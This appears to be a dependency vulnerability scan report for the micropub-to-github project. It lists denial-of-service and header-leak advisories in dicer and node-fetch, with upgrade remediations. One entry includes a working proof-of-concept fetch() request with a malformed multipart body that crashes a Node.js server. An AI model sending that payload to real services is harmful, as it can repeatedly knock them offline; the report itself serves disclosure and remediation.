Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: dicer
- Introduced through: micropub-express@0.8.1
Detailed paths
-
Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › multer@1.4.4 › busboy@0.2.14 › dicer@0.2.5
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.
PoC:
fetch('form-image', {
method: 'POST',
headers: {
['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
['content-length']: '145',
host: '127.0.0.1:8000',
connection: 'keep-alive',
},
body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
});
Remediation
There is no fixed version for dicer
.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: github-publish@3.0.0 and micropub-express@0.8.1
Detailed paths
-
Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › github-publish@3.0.0 › node-fetch@1.7.3Remediation: Upgrade to github-publish@4.0.0.
-
Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › node-fetch@1.7.3
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Information Exposure when fetching a remote url with Cookie, if it get a Location
response header, it will follow that url and try to fetch that url with provided cookie. This can lead to forwarding secure headers to 3th party.
Remediation
Upgrade node-fetch
to version 2.6.7, 3.1.1 or higher.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: github-publish@3.0.0 and micropub-express@0.8.1
Detailed paths
-
Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › github-publish@3.0.0 › node-fetch@1.7.3Remediation: Upgrade to github-publish@4.0.0.
-
Introduced through: micropub-to-github@voxpelli/webpage-micropub-to-github#f71d6dc3aa8549ee0036118d794867c6dc706607 › micropub-express@0.8.1 › node-fetch@1.7.3
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Denial of Service. Node Fetch did not honor the size
option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure.
Remediation
Upgrade node-fetch
to version 2.6.1, 3.0.0-beta.9 or higher.